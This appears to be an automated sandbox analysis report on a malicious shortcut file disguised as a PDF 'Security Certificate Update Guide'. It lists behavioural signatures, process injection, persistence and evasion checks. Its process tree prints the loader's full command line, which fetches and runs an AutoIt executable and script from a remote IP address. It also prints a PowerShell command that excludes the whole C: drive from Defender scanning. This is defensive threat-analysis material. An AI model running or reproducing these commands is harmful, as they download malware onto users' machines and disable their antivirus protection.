Analysis
max time kernel: 149s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230831-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230831-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14/09/2023, 12:33

Static task: static1

Behavioral tasks:
task         Sample                                                                 Resource
behavioral1  Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk  win7-20230831-en
behavioral2  Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk  win10v2004-20230831-en
behavioral3  Security Certificate Critical Update v4321.81178 14 Sept 2023.pdf.lnk  macos-20230831-en
behavioral4  Security Certificate Update Guide.pdf.lnk                              win7-20230831-en
behavioral5  Security Certificate Update Guide.pdf.lnk                              win10v2004-20230831-en
behavioral6  Security Certificate Update Guide.pdf.lnk                              macos-20230831-en
General
Target: Security Certificate Update Guide.pdf.lnk
Size: 1KB
MD5: 3fb9fd77754aa0c99c7d7d1a71bc4216
SHA1: af30bf87d826912b06b62306864eb0bb5701636e
SHA256: aa82b70acc6f8acb4fefa6ca5af6cbd3b33cc18801e2d205c05d182553812309
SHA512: f8ac10c231f8ffe9e1e0e7456ba718bca35fa0a0cd1e8dad9d0267549567c6861261e677c1478c62096bfe3371aa4e11bc8f34037e74b97800339f6661002b1d
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (3 IoCs)
  description            pid   Process      procid_target
  PID 2160 created 1712  2160  Autoit3.exe  31
  PID 2160 created 1712  2160  Autoit3.exe  31
  PID 2928 created 3876  2928  cmd.exe      47

Blocklisted process makes network request (35 IoCs)
  flow                                    pid   Process
  35, 36, 37, 38, 45, 53-79, 83, 84, 85   2928  cmd.exe
  (all 35 flows originate from the same process, PID 2928 cmd.exe)

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation  cmd.exe

Drops startup file (1 IoC)
  description   ioc                                                                                      Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\afdbbka.lnk  cmd.exe

Executes dropped EXE (1 IoC)
  pid   Process
  2160  Autoit3.exe

Suspicious use of SetThreadContext (2 IoCs)
  description                          pid   Process      procid_target
  PID 2160 set thread context of 2928  2160  Autoit3.exe  99
  PID 2928 set thread context of 1680  2928  cmd.exe      101

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 4 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                              Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      cmd.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  cmd.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      Autoit3.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  Autoit3.exe

Suspicious behavior: EnumeratesProcesses (16 IoCs)
  pid   Process         occurrences
  2160  Autoit3.exe     10
  2928  cmd.exe         4
  4376  powershell.exe  2

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  4376  powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs; identical rows are collapsed into an occurrence count)
  description                         pid   Process      procid_target  occurrences
  PID 4148 wrote to memory of 1020    4148  cmd.exe      85             2
  PID 1020 wrote to memory of 1864    1020  cmd.exe      87             2
  PID 1020 wrote to memory of 2160    1020  cmd.exe      88             3
  PID 2160 wrote to memory of 3912    2160  Autoit3.exe  89             10
  PID 2160 wrote to memory of 4936    2160  Autoit3.exe  96             10
  PID 2160 wrote to memory of 2928    2160  Autoit3.exe  99             5
  PID 2928 wrote to memory of 5036    2928  cmd.exe      100            24
  PID 2928 wrote to memory of 1680    2928  cmd.exe      101            5
  PID 2092 wrote to memory of 4376    2092  DllHost.exe  103            3
Processes
Process tree (indentation shows the parent/child depth reported by the sandbox; signatures triggered by each process are listed beneath it):

C:\Windows\system32\backgroundTaskHost.exe (PID 1712)
    command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe (PID 3912)
        command line: "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe (PID 4936)
        command line: "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe (PID 3876)
    command line: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe (PID 5036)
        command line: "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"

C:\Windows\system32\cmd.exe (PID 4148)
    command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Security Certificate Update Guide.pdf.lnk"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\cmd.exe (PID 1020)
        command line: "C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl" & "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" & exit
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\curl.exe (PID 1864)
            command line: curl -# -o "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "http://5.188.87.58:2351" -o "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3" "http://5.188.87.58:2351/msibmyzwoxl"
        C:\Users\Admin\AppData\Local\Temp\Autoit3.exe (PID 2160)
            command line: "C:\Users\Admin\AppData\Local\Temp\Autoit3.exe" "C:\Users\Admin\AppData\Local\Temp\bmyzwoxl.au3"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\cmd.exe (PID 2928)
                command line: cmd.exe
                - Suspicious use of NtCreateUserProcessOtherParentProcess
                - Blocklisted process makes network request
                - Drops startup file
                - Suspicious use of SetThreadContext
                - Checks processor information in registry
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe (PID 1680)
                    command line: cmd.exe

C:\Windows\SysWOW64\DllHost.exe (PID 2092)
    command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4376)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads